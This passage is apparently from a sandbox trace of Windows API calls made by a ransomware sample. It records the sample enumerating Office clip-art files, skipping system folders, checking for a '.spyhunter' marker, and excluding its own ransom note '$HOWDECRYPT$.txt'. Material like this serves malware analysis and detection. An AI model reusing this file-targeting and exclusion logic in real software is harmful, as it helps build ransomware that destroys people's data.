lstrlenW (lpString="System Volume Information") returned 25 [0097.184] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 67 [0097.184] StrStrIW (lpFirst="BS01637_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.184] lstrcmpW (lpString1="BS01637_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.184] lstrcmpW (lpString1="BS01637_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.184] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 67 [0097.184] GetProcessHeap () returned 0x2c0000 [0097.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1cdb0 [0097.184] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x19e8) returned 0x2c310e0 [0097.184] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.184] lstrcmpiW (lpString1="BS01638_.WMF", lpString2="Windows") returned -1 [0097.184] lstrlenW (lpString="Windows") returned 7 [0097.184] lstrcmpiW (lpString1="BS01638_.WMF", lpString2="$Recycle.bin") returned 1 [0097.184] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.184] lstrcmpiW (lpString1="BS01638_.WMF", lpString2="System Volume Information") returned -1 [0097.184] lstrlenW (lpString="System Volume Information") returned 25 [0097.184] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 67 [0097.184] StrStrIW (lpFirst="BS01638_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.185] lstrcmpW (lpString1="BS01638_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.185] lstrcmpW (lpString1="BS01638_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.185] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 67 [0097.185] GetProcessHeap () returned 0x2c0000 [0097.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1ce80 [0097.185] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x19f0) returned 0x2c310e0 [0097.185] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.185] lstrcmpiW (lpString1="BS01639_.WMF", lpString2="Windows") returned -1 [0097.185] lstrlenW (lpString="Windows") returned 7 [0097.185] lstrcmpiW (lpString1="BS01639_.WMF", lpString2="$Recycle.bin") returned 1 [0097.185] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.185] lstrcmpiW (lpString1="BS01639_.WMF", lpString2="System Volume Information") returned -1 [0097.185] lstrlenW (lpString="System Volume Information") returned 25 [0097.185] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 67 [0097.185] StrStrIW (lpFirst="BS01639_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.185] lstrcmpW (lpString1="BS01639_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.185] lstrcmpW (lpString1="BS01639_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.185] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 67 [0097.185] GetProcessHeap () returned 0x2c0000 [0097.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1cf50 [0097.185] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x19f8) returned 0x2c310e0 [0097.185] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.185] lstrcmpiW (lpString1="CARBN_01.MID", lpString2="Windows") returned -1 [0097.185] lstrlenW (lpString="Windows") returned 7 [0097.185] lstrcmpiW (lpString1="CARBN_01.MID", lpString2="$Recycle.bin") returned 1 [0097.186] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.186] lstrcmpiW (lpString1="CARBN_01.MID", lpString2="System Volume Information") returned -1 [0097.186] lstrlenW (lpString="System Volume Information") returned 25 [0097.186] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 67 [0097.186] StrStrIW (lpFirst="CARBN_01.MID", lpSrch=".spyhunter") returned 0x0 [0097.186] lstrcmpW (lpString1="CARBN_01.MID", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.186] lstrcmpW (lpString1="CARBN_01.MID", lpString2="_uninstalling_.png") returned 1 [0097.186] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 67 [0097.186] GetProcessHeap () returned 0x2c0000 [0097.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1d020 [0097.186] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1a00) returned 0x2c310e0 [0097.186] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.186] lstrcmpiW (lpString1="CG1606.WMF", lpString2="Windows") returned -1 [0097.186] lstrlenW (lpString="Windows") returned 7 [0097.186] lstrcmpiW (lpString1="CG1606.WMF", lpString2="$Recycle.bin") returned 1 [0097.186] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.186] lstrcmpiW (lpString1="CG1606.WMF", lpString2="System Volume Information") returned -1 [0097.186] lstrlenW (lpString="System Volume Information") returned 25 [0097.186] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 65 [0097.186] StrStrIW (lpFirst="CG1606.WMF", lpSrch=".spyhunter") returned 0x0 [0097.186] lstrcmpW (lpString1="CG1606.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.186] lstrcmpW (lpString1="CG1606.WMF", lpString2="_uninstalling_.png") returned 1 [0097.186] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 65 [0097.186] GetProcessHeap () returned 0x2c0000 [0097.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x2c1d0f0 [0097.186] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1a08) returned 0x2c310e0 [0097.186] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.187] lstrcmpiW (lpString1="CLASSIC1.WMF", lpString2="Windows") returned -1 [0097.187] lstrlenW (lpString="Windows") returned 7 [0097.187] lstrcmpiW (lpString1="CLASSIC1.WMF", lpString2="$Recycle.bin") returned 1 [0097.187] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.187] lstrcmpiW (lpString1="CLASSIC1.WMF", lpString2="System Volume Information") returned -1 [0097.187] lstrlenW (lpString="System Volume Information") returned 25 [0097.187] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 67 [0097.187] StrStrIW (lpFirst="CLASSIC1.WMF", lpSrch=".spyhunter") returned 0x0 [0097.187] lstrcmpW (lpString1="CLASSIC1.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.187] lstrcmpW (lpString1="CLASSIC1.WMF", lpString2="_uninstalling_.png") returned 1 [0097.187] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 67 [0097.187] GetProcessHeap () returned 0x2c0000 [0097.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1d1c0 [0097.187] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1a10) returned 0x2c310e0 [0097.187] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.187] lstrcmpiW (lpString1="CLASSIC2.WMF", lpString2="Windows") returned -1 [0097.187] lstrlenW (lpString="Windows") returned 7 [0097.187] lstrcmpiW (lpString1="CLASSIC2.WMF", lpString2="$Recycle.bin") returned 1 [0097.187] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.187] lstrcmpiW (lpString1="CLASSIC2.WMF", lpString2="System Volume Information") returned -1 [0097.187] lstrlenW (lpString="System Volume Information") returned 25 [0097.187] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 67 [0097.187] StrStrIW (lpFirst="CLASSIC2.WMF", lpSrch=".spyhunter") returned 0x0 [0097.187] lstrcmpW (lpString1="CLASSIC2.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.187] lstrcmpW (lpString1="CLASSIC2.WMF", lpString2="_uninstalling_.png") returned 1 [0097.187] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 67 [0097.187] GetProcessHeap () returned 0x2c0000 [0097.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1d290 [0097.188] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1a18) returned 0x2c310e0 [0097.188] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.188] lstrcmpiW (lpString1="CLIP.WMF", lpString2="Windows") returned -1 [0097.188] lstrlenW (lpString="Windows") returned 7 [0097.188] lstrcmpiW (lpString1="CLIP.WMF", lpString2="$Recycle.bin") returned 1 [0097.188] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.188] lstrcmpiW (lpString1="CLIP.WMF", lpString2="System Volume Information") returned -1 [0097.188] lstrlenW (lpString="System Volume Information") returned 25 [0097.188] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 63 [0097.188] StrStrIW (lpFirst="CLIP.WMF", lpSrch=".spyhunter") returned 0x0 [0097.188] lstrcmpW (lpString1="CLIP.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.188] lstrcmpW (lpString1="CLIP.WMF", lpString2="_uninstalling_.png") returned 1 [0097.188] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 63 [0097.188] GetProcessHeap () returned 0x2c0000 [0097.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc0) returned 0x32d748 [0097.188] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1a20) returned 0x2c310e0 [0097.188] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.188] lstrcmpiW (lpString1="CMNTY_01.MID", lpString2="Windows") returned -1 [0097.188] lstrlenW (lpString="Windows") returned 7 [0097.188] lstrcmpiW (lpString1="CMNTY_01.MID", lpString2="$Recycle.bin") returned 1 [0097.188] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.188] lstrcmpiW (lpString1="CMNTY_01.MID", lpString2="System Volume Information") returned -1 [0097.188] lstrlenW (lpString="System Volume Information") returned 25 [0097.188] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 67 [0097.188] StrStrIW (lpFirst="CMNTY_01.MID", lpSrch=".spyhunter") returned 0x0 [0097.188] lstrcmpW (lpString1="CMNTY_01.MID", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.188] lstrcmpW (lpString1="CMNTY_01.MID", lpString2="_uninstalling_.png") returned 1 [0097.189] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 67 [0097.189] GetProcessHeap () returned 0x2c0000 [0097.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1d360 [0097.189] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1a28) returned 0x2c310e0 [0097.189] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.189] lstrcmpiW (lpString1="CRANE.WMF", lpString2="Windows") returned -1 [0097.189] lstrlenW (lpString="Windows") returned 7 [0097.189] lstrcmpiW (lpString1="CRANE.WMF", lpString2="$Recycle.bin") returned 1 [0097.189] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.189] lstrcmpiW (lpString1="CRANE.WMF", lpString2="System Volume Information") returned -1 [0097.189] lstrlenW (lpString="System Volume Information") returned 25 [0097.189] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 64 [0097.189] StrStrIW (lpFirst="CRANE.WMF", lpSrch=".spyhunter") returned 0x0 [0097.189] lstrcmpW (lpString1="CRANE.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.189] lstrcmpW (lpString1="CRANE.WMF", lpString2="_uninstalling_.png") returned 1 [0097.189] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 64 [0097.189] GetProcessHeap () returned 0x2c0000 [0097.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc2) returned 0x2c1d430 [0097.189] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1a30) returned 0x2c310e0 [0097.189] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.189] lstrcmpiW (lpString1="CRANINST.WMF", lpString2="Windows") returned -1 [0097.189] lstrlenW (lpString="Windows") returned 7 [0097.189] lstrcmpiW (lpString1="CRANINST.WMF", lpString2="$Recycle.bin") returned 1 [0097.189] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.189] lstrcmpiW (lpString1="CRANINST.WMF", lpString2="System Volume Information") returned -1 [0097.189] lstrlenW (lpString="System Volume Information") returned 25 [0097.189] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 67 [0097.190] StrStrIW (lpFirst="CRANINST.WMF", lpSrch=".spyhunter") returned 0x0 [0097.190] lstrcmpW (lpString1="CRANINST.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.190] lstrcmpW (lpString1="CRANINST.WMF", lpString2="_uninstalling_.png") returned 1 [0097.190] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANINST.WMF") returned 67 [0097.190] GetProcessHeap () returned 0x2c0000 [0097.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1d500 [0097.190] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1a38) returned 0x2c310e0 [0097.190] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.190] lstrcmpiW (lpString1="CUP.WMF", lpString2="Windows") returned -1 [0097.190] lstrlenW (lpString="Windows") returned 7 [0097.190] lstrcmpiW (lpString1="CUP.WMF", lpString2="$Recycle.bin") returned 1 [0097.190] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.190] lstrcmpiW (lpString1="CUP.WMF", lpString2="System Volume Information") returned -1 [0097.190] lstrlenW (lpString="System Volume Information") returned 25 [0097.190] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 62 [0097.190] StrStrIW (lpFirst="CUP.WMF", lpSrch=".spyhunter") returned 0x0 [0097.190] lstrcmpW (lpString1="CUP.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.190] lstrcmpW (lpString1="CUP.WMF", lpString2="_uninstalling_.png") returned 1 [0097.190] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 62 [0097.190] GetProcessHeap () returned 0x2c0000 [0097.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xbe) returned 0x32d680 [0097.190] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1a40) returned 0x2c310e0 [0097.190] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.190] lstrcmpiW (lpString1="CUPINST.WMF", lpString2="Windows") returned -1 [0097.190] lstrlenW (lpString="Windows") returned 7 [0097.190] lstrcmpiW (lpString1="CUPINST.WMF", lpString2="$Recycle.bin") returned 1 [0097.191] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.191] lstrcmpiW (lpString1="CUPINST.WMF", lpString2="System Volume Information") returned -1 [0097.191] lstrlenW (lpString="System Volume Information") returned 25 [0097.191] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 66 [0097.191] StrStrIW (lpFirst="CUPINST.WMF", lpSrch=".spyhunter") returned 0x0 [0097.191] lstrcmpW (lpString1="CUPINST.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.191] lstrcmpW (lpString1="CUPINST.WMF", lpString2="_uninstalling_.png") returned 1 [0097.191] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 66 [0097.191] GetProcessHeap () returned 0x2c0000 [0097.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc6) returned 0x2c1d5d0 [0097.191] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1a48) returned 0x2c310e0 [0097.191] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.191] lstrcmpiW (lpString1="DD00117_.WMF", lpString2="Windows") returned -1 [0097.191] lstrlenW (lpString="Windows") returned 7 [0097.191] lstrcmpiW (lpString1="DD00117_.WMF", lpString2="$Recycle.bin") returned 1 [0097.191] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.191] lstrcmpiW (lpString1="DD00117_.WMF", lpString2="System Volume Information") returned -1 [0097.191] lstrlenW (lpString="System Volume Information") returned 25 [0097.191] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 67 [0097.191] StrStrIW (lpFirst="DD00117_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.191] lstrcmpW (lpString1="DD00117_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.191] lstrcmpW (lpString1="DD00117_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.191] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 67 [0097.191] GetProcessHeap () returned 0x2c0000 [0097.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1d6a0 [0097.191] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1a50) returned 0x2c310e0 [0097.191] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.192] lstrcmpiW (lpString1="DD00121_.WMF", lpString2="Windows") returned -1 [0097.192] lstrlenW (lpString="Windows") returned 7 [0097.192] lstrcmpiW (lpString1="DD00121_.WMF", lpString2="$Recycle.bin") returned 1 [0097.192] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.192] lstrcmpiW (lpString1="DD00121_.WMF", lpString2="System Volume Information") returned -1 [0097.192] lstrlenW (lpString="System Volume Information") returned 25 [0097.192] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 67 [0097.192] StrStrIW (lpFirst="DD00121_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.192] lstrcmpW (lpString1="DD00121_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.192] lstrcmpW (lpString1="DD00121_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.192] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 67 [0097.192] GetProcessHeap () returned 0x2c0000 [0097.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1d770 [0097.192] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1a58) returned 0x2c310e0 [0097.192] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.192] lstrcmpiW (lpString1="DD00234_.WMF", lpString2="Windows") returned -1 [0097.192] lstrlenW (lpString="Windows") returned 7 [0097.192] lstrcmpiW (lpString1="DD00234_.WMF", lpString2="$Recycle.bin") returned 1 [0097.192] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.192] lstrcmpiW (lpString1="DD00234_.WMF", lpString2="System Volume Information") returned -1 [0097.192] lstrlenW (lpString="System Volume Information") returned 25 [0097.192] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 67 [0097.192] StrStrIW (lpFirst="DD00234_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.192] lstrcmpW (lpString1="DD00234_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.192] lstrcmpW (lpString1="DD00234_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.192] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 67 [0097.192] GetProcessHeap () returned 0x2c0000 [0097.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1d840 [0097.193] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1a60) returned 0x2c310e0 [0097.193] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.193] lstrcmpiW (lpString1="DD00255_.WMF", lpString2="Windows") returned -1 [0097.193] lstrlenW (lpString="Windows") returned 7 [0097.193] lstrcmpiW (lpString1="DD00255_.WMF", lpString2="$Recycle.bin") returned 1 [0097.193] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.193] lstrcmpiW (lpString1="DD00255_.WMF", lpString2="System Volume Information") returned -1 [0097.193] lstrlenW (lpString="System Volume Information") returned 25 [0097.193] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 67 [0097.193] StrStrIW (lpFirst="DD00255_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.193] lstrcmpW (lpString1="DD00255_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.193] lstrcmpW (lpString1="DD00255_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.193] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 67 [0097.193] GetProcessHeap () returned 0x2c0000 [0097.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1d910 [0097.193] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1a68) returned 0x2c310e0 [0097.193] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.193] lstrcmpiW (lpString1="DD00256_.WMF", lpString2="Windows") returned -1 [0097.193] lstrlenW (lpString="Windows") returned 7 [0097.193] lstrcmpiW (lpString1="DD00256_.WMF", lpString2="$Recycle.bin") returned 1 [0097.193] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.193] lstrcmpiW (lpString1="DD00256_.WMF", lpString2="System Volume Information") returned -1 [0097.193] lstrlenW (lpString="System Volume Information") returned 25 [0097.193] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 67 [0097.193] StrStrIW (lpFirst="DD00256_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.193] lstrcmpW (lpString1="DD00256_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.194] lstrcmpW (lpString1="DD00256_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.194] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 67 [0097.194] GetProcessHeap () returned 0x2c0000 [0097.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1d9e0 [0097.194] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1a70) returned 0x2c310e0 [0097.194] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.194] lstrcmpiW (lpString1="DD00261_.WMF", lpString2="Windows") returned -1 [0097.194] lstrlenW (lpString="Windows") returned 7 [0097.194] lstrcmpiW (lpString1="DD00261_.WMF", lpString2="$Recycle.bin") returned 1 [0097.194] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.194] lstrcmpiW (lpString1="DD00261_.WMF", lpString2="System Volume Information") returned -1 [0097.194] lstrlenW (lpString="System Volume Information") returned 25 [0097.194] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 67 [0097.194] StrStrIW (lpFirst="DD00261_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.194] lstrcmpW (lpString1="DD00261_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.194] lstrcmpW (lpString1="DD00261_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.194] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 67 [0097.194] GetProcessHeap () returned 0x2c0000 [0097.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1dab0 [0097.194] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1a78) returned 0x2c310e0 [0097.194] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.194] lstrcmpiW (lpString1="DD00297_.WMF", lpString2="Windows") returned -1 [0097.194] lstrlenW (lpString="Windows") returned 7 [0097.194] lstrcmpiW (lpString1="DD00297_.WMF", lpString2="$Recycle.bin") returned 1 [0097.195] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.195] lstrcmpiW (lpString1="DD00297_.WMF", lpString2="System Volume Information") returned -1 [0097.195] lstrlenW (lpString="System Volume Information") returned 25 [0097.195] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft 